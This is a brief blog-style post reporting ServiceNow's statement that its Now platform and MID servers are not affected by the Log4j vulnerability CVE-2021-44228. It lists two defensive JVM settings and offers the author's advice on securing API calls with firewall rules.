ServiceNow & Log4j Vulnerability | CVE-2021-44228

ServiceNow has said that they are not affected by the Log4j vulnerability eventhough they are log4j in their code and they have confirmed further that they are running a version of Java that prevents this behavior by default. In short their Now platform is not affected by Log4j vulnerability. The MID servers have log4j turned off by default for third party libraries.They have also said that Java versions shipped with MID servers are not vulnerable in the post

Some of the settings described below are enabled by default which prevents any ldap or rmi call from ServiceNow

com.sun.jndi.ldap.object.trustURLCodebase=false
com.sun.jndi.rmi.object.trustURLCodebase=false

Source: https://community.servicenow.com/community?id=community_question&sys_id=9f0798fedb144d5439445ac2ca9619d6&view_source=searchResult

KB: https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1000959

As of they are continuing to monitor whether ServiceNow is vulnerable and doing testing as required.

My opinion: Since the code is proprietary no one knows where they are using the log4j versions and since ServiceNow is SAAS vendor, enterprises may not have any control over it but we should be making sure the API calls from ServiceNow to our internal systems are safe and secure. (Adding Web application firewalls that prevents calls with JNDI)

Scroll to Top